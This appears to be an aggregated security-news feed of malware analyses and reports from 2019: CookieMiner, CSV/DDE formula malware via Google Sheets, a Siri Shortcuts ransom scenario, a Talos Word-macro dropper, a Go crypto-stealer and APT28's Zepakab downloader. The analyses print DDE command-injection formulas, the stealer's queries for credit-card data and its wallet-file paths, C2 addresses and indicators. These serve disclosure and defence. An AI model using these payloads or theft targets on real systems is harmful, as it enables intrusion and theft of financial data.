“Cryptocurrency owners should keep an eye on their security settings and digital assets to prevent compromise and leakage,”

Further details, including IoCs, are reported in the analysis published by PaloAlto networks.

Pierluigi Paganini

(SecurityAffairs – CookieMiner, cryptocurrency malware)

The post CookieMiner Mac Malware steals browser cookies and sensitive Data appeared first on Security Affairs.

New Mac malware steals cookies, cryptocurrency and computing power

A new piece of Mac malware is looking to steal both the targets’ computing power and their cryptocurrency stash, Palo Alto Networks researchers warn. About the CookieMiner malware Dubbed CookieMiner on account of its cookie-stealing capabilities, this newly discovered malware is believed to be based on DarthMiner, another recently detected Mac malware that combines the EmPyre backdoor and the XMRig cryptominer. Like DarthMiner, CookieMiner uses the EmPyre backdoor for post-exploitation control. This agent checks if … More

The post New Mac malware steals cookies, cryptocurrency and computing power appeared first on Help Net Security.

Radware Blog: Attackers Are Leveraging Automation

Cybercriminals are weaponizing automation and machine learning to create increasingly evasive attack vectors, and the internet of things (IoT) has proven to be the catalyst driving this trend. IoT is the birthplace of many of the new types of automated bots and malware. At the forefront are botnets, which are increasingly sophisticated, lethal and highly automated digitized […]

The post Attackers Are Leveraging Automation appeared first on Radware Blog.



Radware Blog

Selfie stealing malware found in popular Android beauty camera apps

By Waqas

We all want to look perfect in the pictures that we post online and beauty camera apps are our best bet in order to fine-tune our pictures. However, according to the findings of Trend Micro researchers, these kinds of applications are performing more functions than what we think they are. Reportedly, some of the Android […]

This is a post from HackRead.com Read the original post: Selfie stealing malware found in popular Android beauty camera apps

Top 10 Best Antivirus software for 2019

By Zehra Ali

Open the Internet and your screen will be flooded with hacking news and exploits carried out through the use of sophisticated techniques. It is not uncommon to land on news reports of millions of compromised Internet devices. These stories emerge not merely because of the hacker’s expertise, although this plays a large part. Just as crucial is the lack […]

This is a post from HackRead.com Read the original post: Top 10 Best Antivirus software for 2019

Exclusive: spreading CSV Malware via Google Sheets

Cyber security expert Marco Ramilli, founder of Yoroi,discovered a way to spread CSV malware via Google Sheets … but Big G says it is an
Intended behavior

A .CSV file could be a malware carrier and if interpreted by Microsoft Excel it could become a malware executor ! When I personally saw this technique back in 2017 (please take a look to herehere and here ) I was fascinated. A simple and sweet textual file forcing the behaviour of powerful and protected machines: no macros, no Visual Basics, no exploit were involved. Indeed if you have ever installed Microsoft Excel on your Windows box you’d probably know when you click on a common .CSV file a MSExcel is turned on. It turns on, it opens the selected .CSV file and interprets cells contents. But what if an attacker writes malicious contents into one or more cells? I personally have never received and/or analysed such a droppers until few days ago when it appeared on my spam-box, it quickly became a mandatory analysis for my personal experience :P.

Dropper .CSV

A series of empty fields preceding a final and fake formula piping a CMD.exe command is spawned. By using the bitsadmin technique the attacker downloads a file called now.exe and stores it into a temporary system folder for later execution. In this specific case the downloaded Malware happens to be a variant of NanoCore RAT, but this is not my point for today. If you are interested in the Malware analysis of now.exeplease read here.

At that time the attacker forced the Dynamic Data Exchange (DDE) protocol for interprocess communication supported by Microsoft ExcelLibreOffice and Apache OpenOffice. For example the following formula on OpenOffice will run calc.exe (CVE-2014-3524).

=DDE("cmd";"/C calc";"__DdeLink_60_870516294")

On Microsoft Excel the same result can be reached by introducing the following formula:

=cmd|' /C calc'!A0

While OpenOffice and LibreOffice patched this vulnerability in the following versions: OpenOffice-4.1.1 (ref here) and LibreOffice-4.3.1 (ref here), Microsoft decided to allow this behaviour by introducing two user “warnings”.

Microsoft Excel User Warnings before letting run DDE content

These warnings recommend that the user shouldn’t click if he does not trust the source of the file…. here we go! What about if you received this file from google spreadsheet? Ok, maybe, none in the cybersecurity community will definitely trust a spreadsheet coming from a random GoogleSheet user, but maybe many people out there would trust GoogleSheet without wondering who really sits behind of the shared document.

Google Sheets spreading .CSV dropper

In 2019 the most interesting thing about this technique is the ability to bypass Google filters. By implementing .csv dropper technique an attacker could easily use Google Sheets as a Malware vector. Although Google implements sophisticated GMail and gDrive anti Malware techniques in order to avoid Malware spreading over its amazing technologies, for example: before uploading or downloading a file from gDrive google scans them (ref: here) or avoiding specific file type (.exe, .dll, .zip, etc etc) over GMail (read more here), this time seems to be not as much as “sensible” to such an issue. Google has been alerted about this issue but it confirmed that it’s actually an “Intended Behaviour”.

Google Ticket Changed on Intended Behaviour

Finally an attacker could send a clear link over an instant message platform and/or over eMail asking to open up a Google Sheets suggesting to the victim to open the spreadsheet locally since “MSExcel compatibility issues”. At that time if the victim downloads the Google sheets and opens up locally (with Microsoft), the attacker might infect her box.

I really hope that Google would -at least try- to avoid to be used as an attack vector as it does with many other technologies, but in the meantime please be aware of this issue and if you receive a link to a not working Google Sheets, please do not download it locally.

Further information, including IoCs, are reported in the blog post published by Marco Ramilli.

Pierluigi Paganini

(SecurityAffairs – Google Sheets, hacking)

The post Exclusive: spreading CSV Malware via Google Sheets appeared first on Security Affairs.

Hey Siri, Get My Coffee, Hold the Malware

With Apple’s introduction of iOS 12 for all their supported mobile devices came a powerful new utility for automation of common tasks called Siri Shortcuts. This new feature can be enabled via third-party developers in their apps, or custom built by users downloading the shortcuts app from the app store. Once downloaded and installed, the Shortcuts app grants the power of scripting to perform complex tasks on users’ personal devices.

But accessing the phone from Siri Shortcuts also presents some potential security risks that were discovered by X-Force IRIS and reported to Apple’s security team. This post gives some insight into potential attack scenarios using Shortcuts and reminds users that keeping a tight lid on app permissions is a critical step to upping security on devices and the way we use them.

Shortcuts Make Life Easier, Right?

Want to turn all your lights to disco, play your favorite soundtrack, and text your friends to come over? Or maybe perform complex mathematical computations with a single voice command? Siri Shortcuts can help do that and facilitate much more in user interaction with their devices, directly from the lock screen or via existing apps they use. These shortcuts can also be shared between users, using the app itself via iCloud, which means they can be passed around rather easily.

Beyond users wishing to automate daily activities, app developers can create shortcuts and present them to their user base from within their apps. The shortcut can then appear on the lock screen or in ‘search’ when it is deemed appropriate to show it to the user based on time, location and context. For example, a user approaches their usual coffee shop, and the relevant app pops up a shortcut on the screen to allow them to order the usual cup of java and pay for it on the app before they even enter the coffee shop.

These shortcuts are a nifty addition to Siri’s functionality, but while allowing extended functionality and personalization of the use of Siri, there are some less favorable scenarios to consider.

Siri Shortcuts Can Also Be Abused by Attackers

Siri Shortcuts can be a useful tool for both users and app developers who wish to enhance the level of interaction users have with their apps. But this access can potentially also be abused by malicious third parties. According to X-Force IRIS research, there are security concerns that should be taken into consideration in using Siri Shortcuts.

Siri Demanding Ransom?

Using Siri for malicious purposes, Shortcuts could be created for scareware, a pseudo ransom campaign to try to scare victims into paying a criminal by making them believe their data is in the hands of a remote attacker.

Using native shortcut functionality, a script could be created to speak the ransom demands to the device’s owner by using Siri’s voice. To lend more credibility to the scheme, attackers can automate data collection from the device and have it send back the user’s current physical address, IP address, contents of the clipboard, stored pictures/videos, contact information and more. This data can be displayed to the user to convince them that an attacker can make use of it unless they pay a ransom.

To move the user to the ransom payment stage, the shortcut could automatically access the Internet, browsing to a URL that contains payment information via cryptocurrency wallets, and demand that the user pay-up or see their data deleted, or exposed on the Internet.

The More the Merrier

To add to this scenario, the malicious shortcut can also be configured to spread to other devices by messaging everyone on the victim’s contact list, prompting them to download and install the same shortcut. This would be a cost effective and hard to detect distribution method, coming from a trusted contact.

In a video we created we show how native functionality can be used to make convincing ransom threats to someone running a malicious Siri Shortcut.

Pay attention to the following steps taking place in the video:

  1. The shortcut is configured to gather personal data from the device:
  • It can collect photos from the camera roll.
  • Grab the contents of the clipboard.
  • Get the physical address of the device’s location.
  • Find the external IP address.
  • Get the device’s model.
  • Get the device’s current mobile carrier
  1. The Siri Shortcut can message the information to an external party; this data can also be sent over SSH to the attacker’s server using native functionality.
  2. The Shortcut can set the brightness and volume of the device to 100%
  3. It can turn the device’s flashlight on and off while vibrating at the same time to get the user’s attention and make them believe their device has been taken over.
  4. The Shortcut can be made to speak a ransom note which can include convincing personal details to make the user believe the attacker. For example, it can indicate the IP address and physical address of the person and demand payment.
  5. The Shortcut can be further programmed to then display the spoken note in a written alert format on the device.
  6. To nudge the user to pay up, the Shortcut can be configured to open a webpage, accessing a URL that contains payment information to a cryptocurrency wallet, or a phishing page demanding payment card/account information[1].
  7. To spread around, and since Siri Shortcuts can be shared among users, the malicious Shortcut could also send a link to everyone in the user’s contact list giving it a “worm like” capability[2] that’s easy to deploy but harder to detect.

Not Only Ransom

In our security research labs, we tested the ransom attack scenario. The shortcut we created was named “Ransom” in the video, but it could easily be named any other name to entice users to run it. Lures, such as game cheats/hacking, unlocking secret functionality in apps, or getting free money, often entice users to tap on a shortcut and see where it leads.

From our researchers’ experience, users may fall prey to social engineering and end up installing and running malicious code or apps on their devices.

Using Siri Shortcuts More Safely

Siri Shortcuts has its merits and some security concerns to be aware of. Yet, it is possible to use this functionality in a safer manner.

  1. Never install a Shortcut from an untrusted source.
  2. Check the permissions that the shortcut is requesting and never give permission to portions of your phone you are not comfortable with. Things like photos, location and camera could be used to obtain sensitive information.

Siri Shortcut on iOS12

  1. Use the show actions button before installing a third-party shortcut to see the underlying actions the shortcut might take. Look for things like messaging data to numbers you don’t recognize, emailing data out, or making SSH server connections to servers.

Checking permissions for Siri Shortcut

Apple Controls Centralized Patch Control

Siri Shortcuts is a native feature of iOS12; however, in order to utilize custom shortcuts, one must download the Shortcuts app from Apple’s app store. This gives Apple the ability to patch/update the functionality of the Shortcuts app without having to update the entire OS version.

Users Should Be Very Selective with App Permissions

It’s also important to note that using the shortcuts is designed for, and therefore requires, a lot of user interaction. First, users must download and install the shortcut from a shared source, and then manually tap it to run. Users must also grant access to photos, contacts or any sensitive data the shortcut wants access too.

A sharp reminder to validate anything you install on your mobile device as Shortcuts allows you to see everything the script is capable of before installing. As tempting as it might be to just scroll past that text and hit accept, users must be more aware of good security practices, which includes reading and understanding anything they authorize to run on their device.

[1] Not shown in this video

[2] Not shown in this video

The post Hey Siri, Get My Coffee, Hold the Malware appeared first on Security Intelligence.

5 New Year’s Resolutions for Your IoT Security Strategy

A new year has arrived, and with it comes the opportunity to make all kinds of transformations to help your business. No matter how you navigated the dangerous threat landscape

The post 5 New Year’s Resolutions for Your IoT Security Strategy appeared first on The Cyber Security Place.

FBI Mapping ‘Joanap Malware’ Victims to Disrupt the North Korean Botnet

The United States Department of Justice (DoJ) announced Wednesday its effort to "map and further disrupt" a botnet tied to North Korea that has infected numerous Microsoft Windows computers across the globe over the last decade. Dubbed Joanap, the botnet is believed to be part of "Hidden Cobra"—an Advanced Persistent Threat (APT) actors' group often known as Lazarus Group and Guardians of

Fake Cisco Job Posting Targets Korean Candidates


Edmund Brumaghin and Paul Rascagneres authored this post, with contributions from Jungsoo An.

Executive summary


Cisco Talos recently observed a targeted malware campaign being leveraged in an attempt to compromise specific organizations. The infection vector associated with this campaign was a Microsoft Word document that was disguised as a job posting for Cisco Korea, and leveraged legitimate content available as part of job postings on various websites. EST Security also described this campaign in a blog post this week. This malicious Office document appears to have been the initial portion of what was designed to be a multi-stage infection process.

During our analysis of this campaign, we located additional samples that we believe are linked to multiple previous campaigns associated with the same threat actor. Each of the campaigns leveraged malicious documents and initial stage payloads that all featured similar tactics, techniques, and procedures (TTP). Due to the targeted nature of this campaign, the lack of widespread indicator of compromise data, and the apparent nature of the targeting, this appears to be associated with a sophisticated attacker. This sort of attack has become more common as threat actors continue to target users to gain an initial foothold in environments. Organizations are encouraged to employ a defense-in-depth approach to security and disallow the execution of macros where possible.

 

Malicious Office document


The malicious document purports to relate to an employment opportunity with Cisco in Korea with the name "Job Descriptions.doc." The contents of the document match legitimate job descriptions that are available online. Below is a screenshot showing the contents of the decoy document.
The contents of this document appear to be copied from job descriptions that are publicly available online. Here's an example of these documents:
The file metadata associated with the Word document indicates that it may have been created in 2018, but was last saved on Jan. 29, 2019.
The Microsoft Word document contains malicious macros that are responsible for extracting a malicious PE32 executable called "jusched.exe" (the same name than the Java updater binary) which is dropped into %APPDATA%\Roaming. The macro is obfuscated:
The encoded string is a PE32 executable encoded with the XOR key: 0xe7. Below is the decoded value of the variable str(1), which we can identify as a PE header:
The functionality present in the PE32 is described in the next section.

First-stage malware payload


Binary purpose


The PE32 executable attempts to contact the command and control (C2) server over HTTP, presumably to retrieve additional instructions (script or PE32 executable) for execution on the infected system.
Unfortunately, at the time of our analysis, the second-stage payload was no longer available and the HTTP requests resulted in HTTP 404 messages. The domain contacted is a legitimate website that had been compromised and was being used to host malicious content (www[.]secuvision[.]co[.]kr/).

API obfuscation


The attackers hid four specific API calls. The APIs are not listed in the import table, but they are loaded dynamically using GetProcAddess(). The function names are obfuscated to make static analysis more difficult. Here's one example:
We can see the library name (kernel32.dll) but not the function name (3ez7/+r7zuzx/fvt7d8=). The string is decoded by using mathematical byte operations. Below are the decoded APIs:

    3ez7/+r7zuzx/fvt7d8= ->                        CreateProcessA()
    2vvy++r7y+zy3f/99vvb8Ors598= ->     DeleteURLCacheEntryA()
    y8zS2vHp8PLx//rK8dj38vvf ->             URLDownloadToFileA()
    y8zS0e778M3q7Pv/898= ->                  URLOpenStreamA()

The APIs are linked to the process creation, as well as network communications. We assume the attackers were attempting to hide suspicious APIs from static analysis detection engines that use the import table. The C2 server is listed in plain text, indicating that this functionality was not implemented to thwart manual analysis.

Links to previous campaigns


During our analysis of this campaign, we identified several additional samples that we believe are linked to this campaign.

Case 1


One of these related samples was used in August 2017 and featured the filename "주요 IT 정보보호 및 보안 업체 리스트.zip" ("List of major IT information security and security companies"). The ZIP archive contains an Office document that features the same macros as the original sample, but is responsible for dropping a different PE32 executable. The macros also use the same XOR key as the original sample.
This document describes a list of companies with a summary of their products.

The macros were responsible for dropping a different PE32 executable, that was also called "jusched.exe." The API obfuscation algorithm used in this campaign was the same as the one used in our original sample. Below is a screenshot showing the code execution flow in both samples. On the left is the sample from August 2017. On the right is the sample from January 2019.
The C2 server in this campaign was www[.]syadplus[.]com, which is another legitimate website that was compromised.

The SHA256 of the Office document is: 809b1201b17a77732be3a9f96a25d64c8eb0f7e7a826c6d86bb2b26e12da7b58.

The SHA256 of the PE32 executable is: adfb60104a6399c0b1a6b4e0544cca34df6ecee5339f08f42b52cdfe51e75dc3.

Case 2


The second campaign we identified was observed in November 2017. In this case, the filename was "이력서_자기소개서.xls" ("Resume _ self introduction"). Similar to the previously described campaigns, this document leveraged the same macro execution and XOR key, but was responsible for dropping another PE32 executable.
In this campaign, the malicious document was simply an empty resume template.

The C2 server used in this campaign was ilovesvc[.]com, another example of a legitimate website that had been compromised by the threat actor and used to host malicious content.

The SHA256 of the Office document is: bf27c1631ef64c1e75676375a85d48f8ae97e1ea9a5f67c2beefc02c609fc18b.

The SHA256 of the PE32 is:
1497ab6ddccf91ef7f2cd75ce020bb3bf39979210351deaa6e0025997ddfda5a.

Conclusion


These campaigns demonstrate the increasingly sophisticated nature of attacks that are being leveraged by threat actors attempting to compromise organizations around the world. In this most recent campaign, the attackers took the content of legitimate job postings and used that in an attempt to add legitimacy to the malicious Office documents being delivered to potential victims. The use of the same TTPs across multiple campaigns over a long period demonstrates that this threat actor has been operational for years, and is continuing to operate to achieve their mission objectives. Cisco Talos continues to monitor the global threat landscape to ensure that customers remain protected from these as well as additional attacks that may be observed in the future.

Coverage


Additional ways our customers can detect and block this threat are listed below.

Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

Cisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.

Email Security can block malicious emails sent by threat actors as part of their campaign.

Network Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat.

AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

Indicators of Compromise (IOCs)


The following IOCs are associated to this campaign:

Malicious Office Documents


7af59922d4c1b4f2d589cb2853afb543b37a1f23da0cf0180a693f9748e05906 (SHA256)
bf27c1631ef64c1e75676375a85d48f8ae97e1ea9a5f67c2beefc02c609fc18b (SHA256)
809b1201b17a77732be3a9f96a25d64c8eb0f7e7a826c6d86bb2b26e12da7b58 (SHA256)

Malicious PE32 Executables


e259aa1de48fd10b7601c4486b841428fbd6cd1a4752cf0d3bbe1799116ae6e6 (SHA256)
cd2e8957a2e980ffb82c04e428fed699865542767b257eb888b6732811814a97 (SHA256)
1497ab6ddccf91ef7f2cd75ce020bb3bf39979210351deaa6e0025997ddfda5a (SHA256)
adfb60104a6399c0b1a6b4e0544cca34df6ecee5339f08f42b52cdfe51e75dc3 (SHA256)

Domains


It is important to note that in all of the campaigns that we observed, the domains being leveraged by the malware were legitimate websites that had been compromised by the threat actor for the purposes of hosting malicious content:

www[.]secuvision[.]co[.]kr
ilovesvc[.]com
www[.]syadplus[.]com

Below is a screenshot showing how AMP can protect customers from this threat.



Analyzing a new stealer written in Golang

Golang (Go) is a relatively new programming language, and it is not common to find malware written in it. However, new variants written in Go are slowly emerging, presenting a challenge to malware analysts. Applications written in this language are bulky and look much different under a debugger from those that are compiled in other languages, such as C/C++.

Recently, a new variant of Zebocry malware was observed that was written in Go (detailed analysis available here).

We captured another type of malware written in Go in our lab. This time, it was a pretty simple stealer detected by Malwarebytes as Trojan.CryptoStealer.Go. This post will provide detail on its functionality, but also show methods and tools that can be applied to analyze other malware written in Go.

Analyzed sample

This stealer is detected by Malwarebytes as Trojan.CryptoStealer.Go:

Behavioral analysis

Under the hood, Golang calls WindowsAPI, and we can trace the calls using typical tools, for example, PIN tracers. We see that the malware searches files under following paths:

"C:\Users\tester\AppData\Local\Uran\User Data\"
"C:\Users\tester\AppData\Local\Amigo\User\User Data\"
"C:\Users\tester\AppData\Local\Torch\User Data\"
"C:\Users\tester\AppData\Local\Chromium\User Data\"
"C:\Users\tester\AppData\Local\Nichrome\User Data\"
"C:\Users\tester\AppData\Local\Google\Chrome\User Data\"
"C:\Users\tester\AppData\Local\360Browser\Browser\User Data\"
"C:\Users\tester\AppData\Local\Maxthon3\User Data\"
"C:\Users\tester\AppData\Local\Comodo\User Data\"
"C:\Users\tester\AppData\Local\CocCoc\Browser\User Data\"
"C:\Users\tester\AppData\Local\Vivaldi\User Data\"
"C:\Users\tester\AppData\Roaming\Opera Software\"
"C:\Users\tester\AppData\Local\Kometa\User Data\"
"C:\Users\tester\AppData\Local\Comodo\Dragon\User Data\"
"C:\Users\tester\AppData\Local\Sputnik\Sputnik\User Data\"
"C:\Users\tester\AppData\Local\Google (x86)\Chrome\User Data\"
"C:\Users\tester\AppData\Local\Orbitum\User Data\"
"C:\Users\tester\AppData\Local\Yandex\YandexBrowser\User Data\"
"C:\Users\tester\AppData\Local\K-Melon\User Data\"

Those paths point to data stored from browsers. One interesting fact is that one of the paths points to the Yandex browser, which is popular mainly in Russia.

The next searched path is for the desktop:

"C:\Users\tester\Desktop\*"

All files found there are copied to a folder created in %APPDATA%:

The folder “Desktop” contains all the TXT files copied from the Desktop and its sub-folders. Example from our test machine:

After the search is completed, the files are zipped:

We can see this packet being sent to the C&C (cu23880.tmweb.ru/landing.php):

Inside

Golang compiled binaries are usually big, so it’s no surprise that the sample has been packed with UPX to minimize its size. We can unpack it easily with the standard UPX. As a result, we get plain Go binary. The export table reveals the compilation path and some other interesting functions:

Looking at those exports, we can get an idea of the static libraries used inside.

Many of those functions (trampoline-related) can be found in the module sqlite-3: https://github.com/mattn/go-sqlite3/blob/master/callback.go.

Function crosscall2 comes from the Go runtime, and it is related to calling Go from C/C++ applications (https://golang.org/src/cmd/cgo/out.go).

Tools

For the analysis, I used IDA Pro along with the scripts IDAGolangHelper written by George Zaytsev. First, the Go executable has to be loaded into IDA. Then, we can run the script from the menu (File –> script file). We then see the following menu, giving access to particular features:

First, we need to determine the Golang version (the script offers some helpful heuristics). In this case, it will be Go 1.2. Then, we can rename functions and add standard Go types. After completing those operations, the code looks much more readable. Below, you can see the view of the functions before and after using the scripts.

Before (only the exported functions are named):

After (most of the functions have their names automatically resolved and added):

Many of those functions comes from statically-linked libraries. So, we need to focus primarily on functions annotated as main_* – that are specific to the particular executable.

Code overview

In the function “main_init”, we can see the modules that will be used in the application:

It is statically linked with the following modules:

Analyzing this function can help us predict the functionality; i.e. looking the above libraries, we can see that they will be communicating over the network, reading SQLite3 databases, and throwing exceptions. Other initializers suggests using regular expressions, zip format, and reading environmental variables.

This function is also responsible for initializing and mapping strings. We can see that some of them are first base64 decoded:

In string initializes, we see references to cryptocurrency wallets.

Ethereum:

Monero:

The main function of Golang binary is annotated “main_main”.

Here, we can see that the application is creating a new directory (using a function os.Mkdir). This is the directory where the found files will be copied.

After that, there are several Goroutines that have started using runtime.newproc. (Goroutines can be used similarly as threads, but they are managed differently. More details can be found here). Those routines are responsible for searching for the files. Meanwhile, the Sqlite module is used to parse the databases in order to steal data.

Then, the malware zips it all into one package, and finally, the package is uploaded to the C&C.

What was stolen?

To see what exactly which data the attacker is interested in, we can see look more closely at the functions that are performing SQL queries, and see the related strings.

Strings in Golang are stored in bulk, in concatenated form:

Later, a single chunk from such bulk is retrieved on demand. Therefore, seeing from which place in the code each string was referenced is not-so-easy.

Below is a fragment in the code where an “sqlite3” database is opened (a string of the length 7 was retrieved):

Another example: This query was retrieved from the full chunk of strings, by given offset and length:

Let’s take a look at which data those queries were trying to fetch. Fetching the strings referenced by the calls, we can retrieve and list all of them:

select name_on_card, expiration_month, expiration_year, card_number_encrypted, billing_address_id FROM credit_cards
select * FROM autofill_profiles
select email FROM autofill_profile_emails
select number FROM autofill_profile_phone
select first_name, middle_name, last_name, full_name FROM autofill_profile_names

We can see that the browser’s cookie database is queried in search data related to online transactions: credit card numbers, expiration dates, as well as personal data such as names and email addresses.

The paths to all the files being searched are stored as base64 strings. Many of them are related to cryptocurrency wallets, but we can also find references to the Telegram messenger.

Software\\Classes\\tdesktop.tg\\shell\\open\\command
\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\
\\AppData\\Roaming\\Electrum\\wallets\\default_wallet
\\AppData\\Local\\Torch\\User Data\\
\\AppData\\Local\\Uran\\User Data\\
\\AppData\\Roaming\\Opera Software\\
\\AppData\\Local\\Comodo\\User Data\\
\\AppData\\Local\\Chromium\\User Data\\
\\AppData\\Local\\Chromodo\\User Data\\
\\AppData\\Local\\Kometa\\User Data\\
\\AppData\\Local\\K-Melon\\User Data\\
\\AppData\\Local\\Orbitum\\User Data\\
\\AppData\\Local\\Maxthon3\\User Data\\
\\AppData\\Local\\Nichrome\\User Data\\
\\AppData\\Local\\Vivaldi\\User Data\\
\\AppData\\Roaming\\BBQCoin\\wallet.dat
\\AppData\\Roaming\\Bitcoin\\wallet.dat
\\AppData\\Roaming\\Ethereum\\keystore
\\AppData\\Roaming\\Exodus\\seed.seco
\\AppData\\Roaming\\Franko\\wallet.dat
\\AppData\\Roaming\\IOCoin\\wallet.dat
\\AppData\\Roaming\\Ixcoin\\wallet.dat
\\AppData\\Roaming\\Mincoin\\wallet.dat
\\AppData\\Roaming\\YACoin\\wallet.dat
\\AppData\\Roaming\\Zcash\\wallet.dat
\\AppData\\Roaming\\devcoin\\wallet.dat

Big but unsophisticated malware

Some of the concepts used in this malware remind us of other stealers, such as Evrial, PredatorTheThief, and Vidar. It has similar targets and also sends the stolen data as a ZIP file to the C&C. However, there is no proof that the author of this stealer is somehow linked with those cases.

When we take a look at the implementation as well as the functionality of this malware, it’s rather simple. Its big size comes from many statically-compiled modules. Possibly, this malware is in the early stages of development— its author may have just started learning Go and is experimenting. We will be keeping eye on its development.

At first, analyzing a Golang-compiled application might feel overwhelming, because of its huge codebase and unfamiliar structure. But with the help of proper tools, security researchers can easily navigate this labyrinth, as all the functions are labeled. Since Golang is a relatively new programming language, we can expect that the tools to analyze it will mature with time.

Is malware written in Go an emerging trend in threat development? It’s a little too soon to tell. But we do know that awareness of malware written in new languages is important for our community.

The post Analyzing a new stealer written in Golang appeared first on Malwarebytes Labs.

Reading the ENISA Threat Landscape Report 2018

According to the ENISA Threat Landscape Report 2018, 2018 has brought significant changes in the techniques, tactics, and procedures associated with cybercrime organizations and nation-state actors.

I’m proud to present you the ENISA Threat Landscape Report 2018, the annual report published by the ENISA ETL group that provides insights on the evolution of the cyber threats in 2018.

ENISA Threat Landscape Report 2018

2018 was characterized by significant changes in the cyber threat landscape especially for TTPs associated with threat agent groups. Financially motivated attackers focused their efforts in develing and spreading crypto-miners, this threat appeared in the top 15 threats included in the report.

Nation-state hacking reduced the use of complex malware and appears to go towards low profile social engineering attacks.

“Recent political activities have underlined the emergence of various, quite novel developments in the perceived role of cyberspace for society and national security.” reads the ENISA Threat Landscape Report 2018. “Cyber-diplomacy, cyber-defence and cyberwar regulation have dominated the headlines. These developments, when transposed to actions, are expected to bring new requirements and new use cases for cyberthreat intelligence.”

ENISA experts believe threat actors are going to adapt their activities towards the changes introduced by to prevents the above interference.

The main trends emerged in the 2018’s cyberthreat landscape are:

  • Mail and phishing messages have become the primary malware infection vector.
  • Exploit Kits have lost their importance in the cyberthreat landscape.
  • Cryptominers have become an important monetization vector for cyber-criminals.
  • State-sponsored agents increasingly target banks by using attack-vectors utilised in cyber-crime.
  • Skill and capability building are the main focus of defenders. Public organisations struggle with staff retention due to strong competition with industry in attracting cybersecurity talents.

The report highlights the importance of cyber threat intelligence to respond to increasingly automated attacks leveraging automated tools and skills. Unfortunately, low-capability organisations/end-users have no access to cyberthreat intelligence solutions exposing them to severe risks of hack.

Another element of concern is the diffusion of IoT devices that are poorly protected.

“The need for generic IoT protection architectures/good practices will remain pressing.” continues the report.

All the above trends are detailed in the ENISA Threat Landscape 2018 (ETL 2018), a must-read for cyber security experts and passionates.

Let me close with the Top Threats 2018, for each threat the report includes detailed information on trends and observed evolution.

Enjoy it!


Pierluigi Paganini

(SecurityAffairs –  cybersecurity, ENISA Threat Landscape Report 2018)

The post Reading the ENISA Threat Landscape Report 2018 appeared first on Security Affairs.

Sofacy’s Zepakab Downloader Spotted In-The-Wild

In the last weeks, the Cybaze-Yoroi ZLAB investigated a new APT28 campaign leveraging the Zepakab Downloader.

In the last weeks, the Cybaze-Yoroi ZLAB investigated a new APT28 campaign discovered in January 2019.

The sample has been initially identified by an Italian independent security researcher, who warned the InfoSec community and shared the binary for further analysis.

Cybaze-Yoroi ZLab researchers analyzed this sample to extract indicators and investigate their presence into the Italian landscape.

Technical Analysis

The attack vector is still not clear, APT28 typically use decoy Office documents armed with VB macro. Anyway the analyzed sample pretends to mimic a Microsoft component called “ServiceTray”.

Sha256e6e93c7744d20e2cac2c2b257868686c861d43c6cf3de146b8812778c8283f7d
ThreatZepakab/Zebrocy Downloader
ssdeep12288:QYV6MorX7qzuC3QHO9FQVHPF51jgcSj2EtPo/V7I6R+Lqaw8i6hG0:vBXu9HGaVHh4Po/VU6RkqaQ6F

At first glance the executable shows it is packed using UPX v3.0 compressor, a widely known tool commonly used to minimize the PE file size.

Figure 1. Info about malicious PE.

Interestingly, the resource section of the executable shows a typical binary pattern of the AutoIt v3compiled script: the “AUT3!” signature.

Figure 2. Hexadecimal view reporting the AutoIt v3 header.

After the decompilation and the extraction of the script we noticed the script looks simpler than expected: no obfuscation or anti-analysis tricks found.

The usage of AutoIt language is an emerging characteristic of recent Zepakab downloaders, as also stated by Vitali Kremez, independent security researcher who compared this sample with the older Zepakab implant’s version: the behavior and the script structure are very similar, but obviously the new sample use different command-and-controls servers and artifacts’ names.

Figure 3. Part of malicious decompiled AutoIt script.

After statically setting some variables, such as the C2 url and the payload path, the script invokes the “argv” function calculating a 32 characters random ID.

Figure 4. Function to craft a 32-chars random ID.

Then, it runs the “main” routine. The core of Zepakab. Here the malware implements recon functionalities, retrieves machine information and grabs screenshot every minute.

Figure 5. AutoIt script’s main function.

Then, all the information is encoded in Base64 and sent to the C2 through the “connect” function, using a SSL encrypted HTTP channel. Just before sending its message, the malware adds random padding characters, probably to prevent the automatic decoding of the message; the final request looks like this:

Figure 6. POST request sent to C2C.

The machine information sent to the C2 is gathered within the “info” function, invoking the “_computergetoss” routine. This last code snippet is likely borrowed from a publicly available AutoIT library script called “CompInfo.au3”: an AutoIt interface to access the Windows Management Instrumentation framework’s data.  

Figure 7. Function to retrieve information about victim’s machine.

The code analysis performed also identified another re-used snippet of script: the AutoIT WinHttpwrapper was included into the malicious sample to enable network communication through system proxy.

Figure 8. Blog post reporting the Base64 script, shared by a forum user.

Once communication channel has been established, the command and control analyzes the victim check-in information and, if the compromised machine is likely a target, it sends back the final payload.

The payload will eventually be saved into “C:\ProgramData\Windows\Microsoft\Settings\srhost.exe”and executed inside the “crocodile” function.

Figure 9. The “crocodile” function, used to launch the final payload.

Once the final payload is correctly launched ($cr != 0), the function set the $call variable to False and the main loop of the script terminates.

Unfortunately, the C2 destination is down at time of writing, so it was impossible to retrieve the final payload and proceed with in-depth analysis.

Conclusion

Despite its harmful capabilities, the AutoIt Zepakab malware is quite simple and surprisingly does not use any anti-analysis tricks. The Sofacy group borrowed code from publicly available scripts to ease the development of this new weapon in its arsenal and to keep a low profile in terms of TTP, building a cheap and effective info-stealer malware able to bypass traditional antivirus, almost effortless.

CERT-Yoroi assessed no organization part of its constituency has been impacted by this threat.

Further details, including Yara rules and Indicators of compromise (IoCs), are reported in the analysis published on the Yoroi blog.

Further details, including Yara rules and Indicators of compromise (IoCs), are reported in the analysis published on the Yoroi blog.

Pierluigi Paganini

(SecurityAffairs – Zepakab, APT28)


The post Sofacy’s Zepakab Downloader Spotted In-The-Wild appeared first on Security Affairs.

2019 and Beyond: The (Expanded) RSAC Advisory Board Weighs in on What’s Next: Pt. 2

Part two of RSA’s Conference Advisory Board look into the future tackles how approaches to cybersecurity must evolve to meet new emerging challenges.

Luchando contra Emotet: lecciones desde la primera línea

